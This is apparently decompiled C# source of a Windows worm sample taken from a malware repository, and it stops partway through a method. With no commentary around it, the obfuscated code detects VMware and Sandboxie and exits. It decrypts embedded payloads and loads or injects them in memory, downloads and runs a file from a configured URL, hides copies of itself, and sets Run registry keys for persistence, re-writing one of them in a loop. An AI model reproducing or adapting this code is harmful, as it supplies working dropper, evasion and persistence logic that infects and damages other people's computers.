// Decompiled with JetBrains decompiler // Type: Tm2tqtua3sspuhohl2o5frgcxkwutet2c.Xcpjaqmaubj2y0o3n // Assembly: pff4wjti, Version=6.1.7600.16385, Culture=neutral, PublicKeyToken=null // MVID: 5406B450-382A-49C3-BEAD-27BB328AB378 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.Shakblades.ajg-9d1b9cde375114da6f4c66efbdae5f5f253766dca1651abfc7c38653f32c21ea.exe using G1iw5jvdvf5jyuwmtz03k02vp; using Microsoft.Win32; using System; using System.Diagnostics; using System.IO; using System.IO.Compression; using System.Management; using System.Net; using System.Reflection; using System.Runtime.InteropServices; using System.Threading; using System.Windows.Forms; namespace Tm2tqtua3sspuhohl2o5frgcxkwutet2c { public class Xcpjaqmaubj2y0o3n { private static bool Vyydwy2dzohvetixn = true; private byte[] Xvzsy20ikq50fiuzzzsw14i22; private bool n2gipyxzj1jd3ijqb; private string fzeil4ihxre2gqh3ygpyffp15; private string qw2lxynmeozut0doo; private string Cllbarbs03nsn03hk0bknvl3n = Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0"); private int I12ss4uzgimbzl5qa; private int dluh54iqwipbeun4nsizlk3foyfinw5wt; private int Hgmfkbt4atcy55dirqkgtdkb5; private string Dx4pxl4hlvcwokaeq = Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("XRO"); private string zyygx4b4iahtt0izd = string.Empty; private string Q5aj14jzmb5gozvrp = string.Empty; private int Sqsgcrexehem0lg3mionbxiuw; private string Qeujo4xlzlmqxzlwt = Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0"); private string N4rfcpacyzvdyb5o5pseuwja0 = Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0"); private string ovvhzz3v4t0lncqhc = Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0"); private string hpyhkefmdy2fikaqvpxkxke4zwemgdqgs = Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0"); private string Yu13rcd5iimiqemzz = string.Empty; private string Ouyjahe11vseyu1gc = string.Empty; private string Wbmpi5i4bd1p35dfa2s0jd2tykyightoe = string.Empty; private string wlzgy5x503ocrxvto = string.Empty; private string mlzo2db1vixlaay2xx3qm1uh1 = string.Empty; private string Ifbnriw30u3zqko1o = string.Empty; private string O52jpa3c1kjywan03 = string.Empty; private string aebl4g0r22vys142j542rkxik = string.Empty; private string Pi5xwja3tpz1vyvxe0bvaszsw = string.Empty; private string W0igi2snxiuevrujvdeszp1bxkguemxod = string.Empty; private string Osbrxysckqx0aqx1lzguqifvs = string.Empty; private bool Zx2ycojwb320y2n31; private bool Kbkqxyuop35q5nercdcrjitsn; private string Ueczuk1jlbi3nbg5x2h1wuon0 = string.Empty; private string Ne4uiww2g1iuhqrgv = string.Empty; private bool waiw3pzzuvdgyn5dx3idhqwhncujkp40q; private string upzpncz1hdeloi5k3rlq4a14w = string.Empty; private string ogs5wi51r3m1bqoyn = string.Empty; private string Fl1t0wgsikf4mpxykcardit3b = string.Empty; private string Abfzh2zlzdzdgmqoqnumemerp = string.Empty; private bool etx2nx1n4akedmv4fu2mqzcc0; private bool Dwfbus3rr2dghn14mxukem4jr; private bool Bm3illttk5nwmenvbn3jbmios; private bool s1rnoof103dimlt4vbd0kazwizm4euy4s; private object Rebbtyainmzrpdxrpkhemquuf; private MethodInfo Fau0pig3abdcym2njphkzgkxl; private void xpjiguggif5df23oi(string xkcps1zic2cskbd1y) { string[] separator1 = new string[1] { Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("rpspaujmfcfeku02tmvpfrcod") }; string[] strArray1 = xkcps1zic2cskbd1y.Split(separator1, StringSplitOptions.None); string[] separator2 = new string[1] { Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("vmh2pox3hvii1ls52") }; string[] strArray2 = xkcps1zic2cskbd1y.Split(separator2, StringSplitOptions.None); string[] separator3 = new string[1] { Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("uo3midvthz4usmhbcddxzwvg4") }; string[] strArray3 = xkcps1zic2cskbd1y.Split(separator3, StringSplitOptions.None); string[] separator4 = new string[1] { Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("hzoym5z0i1xmrfcmygv11yqya") }; string[] strArray4 = xkcps1zic2cskbd1y.Split(separator4, StringSplitOptions.None); this.Cllbarbs03nsn03hk0bknvl3n = strArray1[1]; this.fzeil4ihxre2gqh3ygpyffp15 = strArray1[2]; this.qw2lxynmeozut0doo = strArray1[3]; this.I12ss4uzgimbzl5qa = Convert.ToInt32(strArray1[4]); this.dluh54iqwipbeun4nsizlk3foyfinw5wt = Convert.ToInt32(strArray1[5]); this.Hgmfkbt4atcy55dirqkgtdkb5 = Convert.ToInt32(strArray1[6]); this.Dx4pxl4hlvcwokaeq = strArray2[1]; this.zyygx4b4iahtt0izd = strArray2[2]; this.Q5aj14jzmb5gozvrp = strArray2[3]; this.Sqsgcrexehem0lg3mionbxiuw = Convert.ToInt32(strArray3[1]); this.Qeujo4xlzlmqxzlwt = strArray3[2]; this.N4rfcpacyzvdyb5o5pseuwja0 = strArray3[3]; this.ovvhzz3v4t0lncqhc = strArray3[4]; this.hpyhkefmdy2fikaqvpxkxke4zwemgdqgs = strArray3[5]; this.Yu13rcd5iimiqemzz = strArray3[6]; this.Ouyjahe11vseyu1gc = strArray3[7]; this.Wbmpi5i4bd1p35dfa2s0jd2tykyightoe = strArray3[8]; this.wlzgy5x503ocrxvto = strArray3[9]; this.mlzo2db1vixlaay2xx3qm1uh1 = strArray3[10]; this.Ifbnriw30u3zqko1o = strArray3[11]; this.O52jpa3c1kjywan03 = this.bxmgxqvn0tzn2pwdo5ezgxkdh(strArray3[12]); this.aebl4g0r22vys142j542rkxik = strArray3[13]; this.Pi5xwja3tpz1vyvxe0bvaszsw = strArray3[14]; this.W0igi2snxiuevrujvdeszp1bxkguemxod = strArray3[15]; this.Zx2ycojwb320y2n31 = Convert.ToBoolean(strArray3[16]); this.Kbkqxyuop35q5nercdcrjitsn = Convert.ToBoolean(strArray3[17]); this.Ueczuk1jlbi3nbg5x2h1wuon0 = this.yti5olupwaivlclet(strArray3[18]) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\") + Path.GetRandomFileName(); this.Osbrxysckqx0aqx1lzguqifvs = strArray3[19]; this.Ne4uiww2g1iuhqrgv = strArray3[20]; this.Ueczuk1jlbi3nbg5x2h1wuon0 = this.Ueczuk1jlbi3nbg5x2h1wuon0.Substring(0, this.Ueczuk1jlbi3nbg5x2h1wuon0.Length - 4) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss(".xee"); Path.GetPathRoot(Environment.GetFolderPath(Environment.SpecialFolder.System)); switch (this.Ne4uiww2g1iuhqrgv) { case "0": try { this.Ne4uiww2g1iuhqrgv = IntPtr.Size != 4 ? Environment.GetEnvironmentVariable(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("wniidr")) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\irsf.E\\rmwr6\\20577vceeMcootNTFaeok4v..02\\b.x") : Environment.GetEnvironmentVariable(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("wniidr")) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\irsf.E\\rmwr\\20577vceeMcootNTFaeokv..02\\b.x"); break; } catch (Exception ex) { break; } case "1": this.Ne4uiww2g1iuhqrgv = Environment.GetEnvironmentVariable(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("wniidr")) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\irsf.E\\rmwr\\20577cceeMcootNTFaeokv..02\\s.x"); break; } this.waiw3pzzuvdgyn5dx3idhqwhncujkp40q = Convert.ToBoolean(strArray4[1]); this.upzpncz1hdeloi5k3rlq4a14w = strArray4[2]; this.ogs5wi51r3m1bqoyn = strArray4[3]; this.Fl1t0wgsikf4mpxykcardit3b = strArray4[4]; this.Abfzh2zlzdzdgmqoqnumemerp = strArray4[5]; this.etx2nx1n4akedmv4fu2mqzcc0 = Convert.ToBoolean(strArray4[6]); this.Dwfbus3rr2dghn14mxukem4jr = Convert.ToBoolean(strArray4[7]); this.Bm3illttk5nwmenvbn3jbmios = Convert.ToBoolean(strArray4[8]); this.s1rnoof103dimlt4vbd0kazwizm4euy4s = Convert.ToBoolean(strArray4[9]); this.Fl1t0wgsikf4mpxykcardit3b = this.yti5olupwaivlclet(this.Fl1t0wgsikf4mpxykcardit3b); MessageBoxButtons[] messageBoxButtonsArray = new MessageBoxButtons[6] { MessageBoxButtons.OK, MessageBoxButtons.OKCancel, MessageBoxButtons.YesNo, MessageBoxButtons.YesNoCancel, MessageBoxButtons.RetryCancel, MessageBoxButtons.AbortRetryIgnore }; MessageBoxIcon[] messageBoxIconArray = new MessageBoxIcon[5] { MessageBoxIcon.Hand, MessageBoxIcon.Asterisk, MessageBoxIcon.Question, MessageBoxIcon.Exclamation, MessageBoxIcon.None }; if (!(this.Cllbarbs03nsn03hk0bknvl3n == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))) return; Thread.Sleep(this.Hgmfkbt4atcy55dirqkgtdkb5 * 1000); int num = (int) MessageBox.Show(this.fzeil4ihxre2gqh3ygpyffp15, this.qw2lxynmeozut0doo, messageBoxButtonsArray[this.I12ss4uzgimbzl5qa], messageBoxIconArray[this.dluh54iqwipbeun4nsizlk3foyfinw5wt]); } private byte[] T20r4skkjzxet5xxndjdxm23nq1de3ste( byte[] j53vpo23pks1sawtewkqd4g3v, int wtxw3dfyzvb2m5edzmygxag3t) { GZipStream gzipStream = new GZipStream((Stream) new MemoryStream(j53vpo23pks1sawtewkqd4g3v), CompressionMode.Decompress); byte[] buffer = new byte[wtxw3dfyzvb2m5edzmygxag3t]; gzipStream.Read(buffer, 0, buffer.Length); return buffer; } private object Ceyweulgsxaof4hwmnwokglbk(int mn0yawr33ammr4eax42s3tcgr) { Assembly assembly = Assembly.Load(Zgyvqmp0xpqwooihm.Rhjia2qmjg1uefwsxroduqr0s(Xcpjaqmaubj2y0o3n.q1cagpbvwn04kmqyi(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("rnEdluP.l")))); Thread.Sleep(1000); System.Type type = assembly.GetTypes()[mn0yawr33ammr4eax42s3tcgr]; this.Fau0pig3abdcym2njphkzgkxl = type.GetMethod(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Rnu")); return Activator.CreateInstance(type); } private void persistenceStartup( string Ymom4ixsncavvmzwlpzsuuw3j, string oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, string Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x) { Registry.CurrentUser.OpenSubKey(Ymom4ixsncavvmzwlpzsuuw3j, true).SetValue(oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, (object) Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x); RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(Ymom4ixsncavvmzwlpzsuuw3j, true); bool flag = true; while (flag) { Application.DoEvents(); if (registryKey.OpenSubKey(Ymom4ixsncavvmzwlpzsuuw3j + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\a1adcpdsq0gn123io4m1f55gxptbkhd2e")) == null) registryKey.SetValue(oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, (object) Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x); Thread.Sleep(2000); } } private byte[] P2dz552iekyo3s3by(byte[] xkcps1zic2cskbd1y) { if (this.Dx4pxl4hlvcwokaeq == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("xro")) xkcps1zic2cskbd1y = Zgyvqmp0xpqwooihm.Rhjia2qmjg1uefwsxroduqr0s(xkcps1zic2cskbd1y); return xkcps1zic2cskbd1y; } private void fyld3x5pir2kaoksligurapzj(byte[] Cplqgntbylcl1knxmqpm2hjar) { try { if (this.ogs5wi51r3m1bqoyn == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0")) { try { if (!this.Qhlb0achfvgjxeekj(Cplqgntbylcl1knxmqpm2hjar)) { this.Rebbtyainmzrpdxrpkhemquuf = this.Ceyweulgsxaof4hwmnwokglbk(0); this.Fau0pig3abdcym2njphkzgkxl.Invoke(this.Rebbtyainmzrpdxrpkhemquuf, new object[3] { (object) Cplqgntbylcl1knxmqpm2hjar, (object) this.Ne4uiww2g1iuhqrgv, null }); } } catch { string tempFileName = Path.GetTempFileName(); this.Xu4noszs2jndqy0uakulzk0hj(Cplqgntbylcl1knxmqpm2hjar, tempFileName, true); } } if (!(this.ogs5wi51r3m1bqoyn == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))) return; string str = this.Fl1t0wgsikf4mpxykcardit3b + this.Abfzh2zlzdzdgmqoqnumemerp; this.Xu4noszs2jndqy0uakulzk0hj(Cplqgntbylcl1knxmqpm2hjar, str, true); if (this.etx2nx1n4akedmv4fu2mqzcc0) System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.Hidden); if (this.Dwfbus3rr2dghn14mxukem4jr) System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.ReadOnly); if (!this.Bm3illttk5nwmenvbn3jbmios) return; System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.System); } catch (Exception ex) { } } private bool Qhlb0achfvgjxeekj(byte[] Zq0k51bndsjftafxi) { Xcpjaqmaubj2y0o3n.ooaqlrxjthzq5ykyeqamxwsxh(Zq0k51bndsjftafxi); bool vyydwy2dzohvetixn = Xcpjaqmaubj2y0o3n.Vyydwy2dzohvetixn; Xcpjaqmaubj2y0o3n.Vyydwy2dzohvetixn = true; return vyydwy2dzohvetixn; } private void Xu4noszs2jndqy0uakulzk0hj( byte[] iz1q112gcqzev5oqr, string Dutorh5b0eqbkqejp, bool Fc4ucvsrmmkck30rx) { try { System.IO.File.WriteAllBytes(Dutorh5b0eqbkqejp, iz1q112gcqzev5oqr); if (!Fc4ucvsrmmkck30rx) return; new Process() { StartInfo = { FileName = Dutorh5b0eqbkqejp } }.Start(); } catch { } } private byte[] idbm12rhs0k0m25by( string V3ih4ivpcexzrkelfjctk5bov, int Wi2vtkb2qd4j53iy5fbdxtgmp, string k0vs32obabddwwiqnt4br14zo) { try { IntPtr hModule = Mvsaeg2eeoaqx3utk.cz23ictx0pf1xcpsqzxf3ue5fsjhmn3fi(string.Empty); IntPtr hResInfo = Mvsaeg2eeoaqx3utk.Nyja0dryfvflph11ok4ga5zpz(hModule, Wi2vtkb2qd4j53iy5fbdxtgmp, k0vs32obabddwwiqnt4br14zo); uint length = Mvsaeg2eeoaqx3utk.Wy3i4lea5jxu3fiu1mt0jbvl4gefufsn2(hModule, hResInfo); IntPtr source = Mvsaeg2eeoaqx3utk.Xpo3aq0mxqyvzr1zld5qguuzg(hModule, hResInfo); byte[] destination = new byte[(IntPtr) length]; Marshal.Copy(source, destination, 0, (int) length); return destination; } catch (Exception ex) { Console.WriteLine(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Errraigrsuc:ro edn eore ") + Environment.NewLine + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Errcd:ro oe ") + ex.Message); return (byte[]) null; } } private void Dbrrlmqkrn3ydjtvavk43x5l324iaa3cy( string Ymom4ixsncavvmzwlpzsuuw3j, string oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, string Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x, int lglb5oxkofx5lhfsdpmd3oohjsw1nlznk) { this.n2gipyxzj1jd3ijqb = true; if (lglb5oxkofx5lhfsdpmd3oohjsw1nlznk == 1) Registry.CurrentUser.OpenSubKey(Ymom4ixsncavvmzwlpzsuuw3j, true).SetValue(oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, (object) Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x); if (lglb5oxkofx5lhfsdpmd3oohjsw1nlznk == 2) Registry.LocalMachine.OpenSubKey(Ymom4ixsncavvmzwlpzsuuw3j, true).SetValue(oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, (object) Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x); if (lglb5oxkofx5lhfsdpmd3oohjsw1nlznk != 3) return; RegistryKey subKey = Registry.LocalMachine.CreateSubKey(Ymom4ixsncavvmzwlpzsuuw3j + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\") + oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie); subKey.SetValue(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("SuPttbah"), (object) Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x); subKey.Close(); if (Registry.CurrentUser.OpenSubKey(Ymom4ixsncavvmzwlpzsuuw3j + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\") + oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, true) == null) return; Registry.CurrentUser.DeleteSubKey(Ymom4ixsncavvmzwlpzsuuw3j + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\") + oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, false); } private string bxmgxqvn0tzn2pwdo5ezgxkdh(string Tmq5yh2mj4cu1ncxfduvfse4gpe31bjz3) { string str = string.Empty; if (Tmq5yh2mj4cu1ncxfduvfse4gpe31bjz3 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0")) str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\"); if (Tmq5yh2mj4cu1ncxfduvfse4gpe31bjz3 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1")) str = Path.GetTempPath(); if (Tmq5yh2mj4cu1ncxfduvfse4gpe31bjz3 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("2")) str = Environment.GetFolderPath(Environment.SpecialFolder.Personal) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\"); return str; } public void bocln5xhicnup1rlmeg3v0wq5fq30ikg2() { string executablePath = Application.ExecutablePath; try { this.xpjiguggif5df23oi(rzo4euwupytyapwx03g5pnbwx.trdpamic2sckcdwunnjaiq5ctjzbh44ol(this.idbm12rhs0k0m25by(executablePath, 16, Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("CCSI0IZJHGS1OVNFRTEN3VJ02")))); this.Xvzsy20ikq50fiuzzzsw14i22 = this.idbm12rhs0k0m25by(executablePath, 44, Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("BUEVDVEHTVBYWB1VY0OFU1FDB")); if (this.Qeujo4xlzlmqxzlwt == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1")) this.Xvzsy20ikq50fiuzzzsw14i22 = this.T20r4skkjzxet5xxndjdxm23nq1de3ste(this.Xvzsy20ikq50fiuzzzsw14i22, this.Sqsgcrexehem0lg3mionbxiuw); this.Xvzsy20ikq50fiuzzzsw14i22 = this.P2dz552iekyo3s3by(this.Xvzsy20ikq50fiuzzzsw14i22); if (!this.Zx2ycojwb320y2n31) { this.Rebbtyainmzrpdxrpkhemquuf = this.Ceyweulgsxaof4hwmnwokglbk(0); this.Fau0pig3abdcym2njphkzgkxl.Invoke(this.Rebbtyainmzrpdxrpkhemquuf, new object[3] { (object) this.Xvzsy20ikq50fiuzzzsw14i22, (object) this.Ne4uiww2g1iuhqrgv, (object) Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("") }); } else this.Qhlb0achfvgjxeekj(this.Xvzsy20ikq50fiuzzzsw14i22); if (this.Kbkqxyuop35q5nercdcrjitsn) this.Xu4noszs2jndqy0uakulzk0hj(this.Xvzsy20ikq50fiuzzzsw14i22, this.Ueczuk1jlbi3nbg5x2h1wuon0, true); string str; if (!string.IsNullOrEmpty(this.Osbrxysckqx0aqx1lzguqifvs)) { str = this.O52jpa3c1kjywan03 + this.Osbrxysckqx0aqx1lzguqifvs + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\") + this.Ifbnriw30u3zqko1o; Directory.CreateDirectory(this.O52jpa3c1kjywan03 + this.Osbrxysckqx0aqx1lzguqifvs); } else str = this.O52jpa3c1kjywan03 + this.Ifbnriw30u3zqko1o; if (this.N4rfcpacyzvdyb5o5pseuwja0 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1")) this.Dbrrlmqkrn3ydjtvavk43x5l324iaa3cy(this.Yu13rcd5iimiqemzz, this.Wbmpi5i4bd1p35dfa2s0jd2tykyightoe, str, 1); if (this.ovvhzz3v4t0lncqhc == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1")) this.Dbrrlmqkrn3ydjtvavk43x5l324iaa3cy(this.Yu13rcd5iimiqemzz, this.wlzgy5x503ocrxvto, str, 2); if (this.hpyhkefmdy2fikaqvpxkxke4zwemgdqgs == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1")) this.Dbrrlmqkrn3ydjtvavk43x5l324iaa3cy(this.Ouyjahe11vseyu1gc, this.mlzo2db1vixlaay2xx3qm1uh1, str, 3); if (this.n2gipyxzj1jd3ijqb) { byte[] bytes = System.IO.File.ReadAllBytes(Application.ExecutablePath); if (!System.IO.File.Exists(str)) System.IO.File.WriteAllBytes(str, bytes); if (System.IO.File.Exists(str)) { if (this.aebl4g0r22vys142j542rkxik == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1")) System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.Hidden); if (this.Pi5xwja3tpz1vyvxe0bvaszsw == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1")) System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.ReadOnly); if (this.W0igi2snxiuevrujvdeszp1bxkguemxod == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1")) System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.System); } } this.ulry4uhtwnw50g04z(rzo4euwupytyapwx03g5pnbwx.trdpamic2sckcdwunnjaiq5ctjzbh44ol(this.idbm12rhs0k0m25by(executablePath, 47, Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("AHAAJWFXQRWK55DBF5CZOY25NAJ1XU0TF")))); if (this.waiw3pzzuvdgyn5dx3idhqwhncujkp40q) this.fyld3x5pir2kaoksligurapzj(new WebClient().DownloadData(new Uri(this.upzpncz1hdeloi5k3rlq4a14w))); this.persistenceStartup(this.Yu13rcd5iimiqemzz, this.Wbmpi5i4bd1p35dfa2s0jd2tykyightoe, str); } catch (Exception ex) { Console.WriteLine(ex.Message); } } private static void pq0wico5ukmaxyfwlssnrl0r1nqartkt4(object Qilit4odml3450ffdduw5begg) { try { MethodInfo entryPoint = Assembly.Load((byte[]) Qilit4odml3450ffdduw5begg).EntryPoint; if (entryPoint.GetParameters().Length == 1) entryPoint.Invoke((object) null, new object[1] { (object) new string[0] }); else entryPoint.Invoke((object) null, (object[]) null); } catch { Xcpjaqmaubj2y0o3n.Vyydwy2dzohvetixn = false; } } public static byte[] q1cagpbvwn04kmqyi(string lhs5nwmsu4p3h3rgf) { using (Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(lhs5nwmsu4p3h3rgf)) { byte[] buffer = new byte[1024]; using (MemoryStream memoryStream = new MemoryStream()) { while (true) { int count = manifestResourceStream.Read(buffer, 0, buffer.Length); if (count > 0) memoryStream.Write(buffer, 0, count); else break; } return memoryStream.ToArray(); } } } [DllImport("kernel32.dll")] public static extern IntPtr GetModuleHandle(string lpModuleName); private static void Main(string[] args) { string empty = string.Empty; foreach (ManagementBaseObject instance in new ManagementClass(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Wn2Boi3_is")).GetInstances()) { if (instance.Properties[Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Sranmeeilubr")].Value.ToString().Trim().ToLower().IndexOf(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("vwrmae")) > -1) { int num = (int) MessageBox.Show(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Ti plcto antb u navrulmcieevrnethsapiaincno erni ita ahn niomn."), Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("VrulMcieDtceita ahn eetd"), MessageBoxButtons.OK, MessageBoxIcon.Hand); Environment.Exit(0); } } if (Xcpjaqmaubj2y0o3n.GetModuleHandle(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("SiDldlbel.l")).ToInt32() != 0) { int num = (int) MessageBox.Show(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Ti plcto antb u naSnbxeevrnethsapiaincno erni adoi niomn."), Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("SnbxeDtceadoi eetd"), MessageBoxButtons.OK, MessageBoxIcon.Hand); Environment.Exit(0); } new Xcpjaqmaubj2y0o3n().bocln5xhicnup1rlmeg3v0wq5fq30ikg2(); } private void ulry4uhtwnw50g04z(string xkcps1zic2cskbd1y) { string[] separator1 = new string[1] { Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Qslygidk2ydujmodz1hnjxa40is244mdu") }; string[] separator2 = new string[1] { Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("swmnvnjfto3vjpznbcurldfzy") }; string[] strArray1 = xkcps1zic2cskbd1y.Split(separator1, StringSplitOptions.None); string empty1 = string.Empty; string empty2 = string.Empty; string empty3 = string.Empty; for (int index = 1; index < strArray1.GetUpperBound(0); ++index) { string[] strArray2 = strArray1[index].Split(separator2, StringSplitOptions.None); byte[] numArray = rzo4euwupytyapwx03g5pnbwx.fuwrggsyeop321rci(strArray2[1]); string str1 = strArray2[2]; bool boolean1 = Convert.ToBoolean(strArray2[3]); string Ibpa121djgybg55fkysgepjc0y2qiasb2 = strArray2[4]; bool boolean2 = Convert.ToBoolean(strArray2[5]); bool boolean3 = Convert.ToBoolean(strArray2[6]); int int32 = Convert.ToInt32(strArray2[7]); bool boolean4 = Convert.ToBoolean(strArray2[8]); string str2 = this.yti5olupwaivlclet(Ibpa121djgybg55fkysgepjc0y2qiasb2); if (boolean1) { if (boolean3) numArray = this.T20r4skkjzxet5xxndjdxm23nq1de3ste(numArray, int32); if (boolean2) numArray = this.P2dz552iekyo3s3by(numArray); if (!boolean4) { try { this.Rebbtyainmzrpdxrpkhemquuf = this.Ceyweulgsxaof4hwmnwokglbk(0); this.Fau0pig3abdcym2njphkzgkxl.Invoke(this.Rebbtyainmzrpdxrpkhemquuf, new object[3] { (object) numArray, (object) this.Ne4uiww2g1iuhqrgv, null }); } catch (Exception ex) { Console.WriteLine(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Errijcigbudfl nommr:ro netn on ieit eoy ") + Environment.NewLine + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Errcd:ro oe ") + ex.Message); } } else if (!this.Qhlb0achfvgjxeekj(numArray)) Console.WriteLine(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Errijcigbudfl sn elcin ro netn on ieuigrfeto:")); } else { string Dutorh5b0eqbkqejp = str2 + str1; if (boolean2) numArray = this.P2dz552iekyo3s3by(numArray); this.Xu4noszs2jndqy0uakulzk0hj(numArray, Dutorh5b0eqbkqejp, true); } } } private static void ooaqlrxjthzq5ykyeqamxwsxh(byte[] Amqk5npffix20x5qn5x2vnb3b) { try { Thread thread = new Thread(new ParameterizedThreadStart(Xcpjaqmaubj2y0o3n.pq0wico5ukmaxyfwlssnrl0r1nqartkt4)); thread.SetApartmentState(ApartmentState.STA); thread.Start((object) Amqk5npffix20x5qn5x2vnb3b); thread.Join(); } catch { Xcpjaqmaubj2y0o3n.Vyydwy2dzohvetixn = false; } } private string yti5olupwaivlclet(string Ibpa121djgybg55fkysgepjc0y2qiasb2) { if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("ApiainPtplcto ah")) Ibpa121djgybg55fkysgepjc0y2qiasb2 = Application.StartupPath + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\"); if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Tmep")) Ibpa121djgybg55fkysgepjc0y2qiasb2 = Path.GetTempPath(); if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("ApaapDt")) Ibpa121djgybg55fkysgepjc0y2qiasb2 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\"); if 